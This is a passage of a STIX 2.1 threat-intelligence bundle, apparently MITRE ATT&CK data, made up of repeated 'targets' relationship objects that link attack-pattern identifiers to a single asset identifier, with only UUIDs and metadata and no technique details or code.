"2024-07-01T10:37:15.837660", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7467d3d9-0d06-448d-9215-b7b74aa19138", "created": "2024-07-01T10:37:15.837668", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837670", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbba7ab4-74dc-46cb-b6ec-6d2bd0d2624a", "created": "2024-07-01T10:37:15.837677", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837679", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c095884c-e236-4c6d-b5e4-e9fe6d71a7b2", "created": "2024-07-01T10:37:15.837687", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837689", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cbef9a91-f854-454b-a9f5-624c7b3554ab", "created": "2024-07-01T10:37:15.837697", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837699", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92194257-1f57-49cd-a1a8-1fa8a7f82b20", "created": "2024-07-01T10:37:15.837706", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837708", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0001f9bc-41fd-4ddd-9e9d-1aca30cd8616", "created": "2024-07-01T10:37:15.837716", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837718", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb082d30-754a-4924-b28c-434c2b0a7042", "created": "2024-07-01T10:37:15.837726", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837728", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66b1c11a-83b1-4301-8e3a-791674b7f038", "created": "2024-07-01T10:37:15.837735", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837737", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d3ece4f-391e-4b60-9e0b-60fe717994b0", "created": "2024-07-01T10:37:15.837745", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837747", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f883bba-c7f5-44c8-98a3-1741e26fd269", "created": "2024-07-01T10:37:15.837755", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837757", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--858d6d23-236c-47a5-914a-9ecc2977b869", "created": "2024-07-01T10:37:15.837764", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837766", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31c8910f-7163-42d5-968b-b29d1c715354", "created": "2024-07-01T10:37:15.837774", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837776", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6369e124-477f-4ab9-aaea-44392c90b0db", "created": "2024-07-01T10:37:15.837784", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837786", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2174e7b-2913-406a-9250-3da8a68ad599", "created": "2024-07-01T10:37:15.837793", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837795", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa4e51a5-7c9a-40d0-834a-92f083893320", "created": "2024-07-01T10:37:15.837803", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837805", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--034e315c-1eb0-4d0f-a52f-1bb567bf3c70", "created": "2024-07-01T10:37:15.837813", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837815", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--940eb638-3cf6-4117-8c6d-a0ea7c9bb990", "created": "2024-07-01T10:37:15.837823", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837825", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fb32546-d32a-4919-8a42-089947e79bb1", "created": "2024-07-01T10:37:15.837833", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837835", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72a5ee8b-89b1-4666-964c-05e5fe628099", "created": "2024-07-01T10:37:15.837842", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837844", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7555a3c0-7eff-4fba-b7b4-c039271b2760", "created": "2024-07-01T10:37:15.837852", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837854", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1461567-f537-494b-9bbd-da7aad2e0321", "created": "2024-07-01T10:37:15.837861", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837864", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4adda106-53a0-4e5b-a06a-1f8b3addc9b5", "created": "2024-07-01T10:37:15.837871", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837873", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dca2b7a0-cea0-4f96-b173-9cda3476719c", "created": "2024-07-01T10:37:15.837881", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837883", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--85b98598-1f88-4760-b5c8-e0a68fd13cb8", "created": "2024-07-01T10:37:15.837890", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837893", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f3f187e6-7e4b-4f80-9dd4-56b333f4c2b7", "created": "2024-07-01T10:37:15.837900", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837902", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c8204ef-42c0-4d4a-a8a0-b36b9a965093", "created": "2024-07-01T10:37:15.837910", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837912", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6630e709-3abf-456f-96f8-1d578e8aacd0", "created": "2024-07-01T10:37:15.837920", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837922", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a23d7d8c-bd7e-4128-9425-f33a5a376058", "created": "2024-07-01T10:37:15.837930", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837932", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b2f4f630-363f-40eb-a2c8-4ec9c7c04d2c", "created": "2024-07-01T10:37:15.837939", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837941", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--433c6ff3-f9dc-47ee-b3a8-5854aac022d8", "created": "2024-07-01T10:37:15.837949", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837951", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6948ad2-a2c5-4e7e-b807-cbb063b18efb", "created": "2024-07-01T10:37:15.837959", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837961", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3085618b-7897-4f06-8a65-b43ed3ab6eed", "created": "2024-07-01T10:37:15.837968", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837971", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea1c844e-76ad-4e58-b8a1-b922011526e1", "created": "2024-07-01T10:37:15.837978", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837980", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--35d11023-ae2e-459d-8860-c368bcb938a1", "created": "2024-07-01T10:37:15.837988", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.837990", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--486041c9-2f64-4825-9de5-4f42cbd62223", "created": "2024-07-01T10:37:15.837998", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838000", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8752f82f-6452-4521-b24a-e9b5e7309c33", "created": "2024-07-01T10:37:15.838007", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838009", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--458ca645-6e83-4d27-b385-42869eb51450", "created": "2024-07-01T10:37:15.838017", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838019", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fea26803-36d4-4544-b949-8b3ebcc11345", "created": "2024-07-01T10:37:15.838027", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838029", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ee8a95a-527a-48cd-bae8-9f8dd0f4ca5f", "created": "2024-07-01T10:37:15.838036", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838038", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84c04cc6-1a71-4144-baa8-edf4e6b2a187", "created": "2024-07-01T10:37:15.838046", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838048", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b86ed357-fb8d-4b21-9234-d97abee74c96", "created": "2024-07-01T10:37:15.838056", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.838058", "description": "", "relationship_type": "targets", "source_ref": 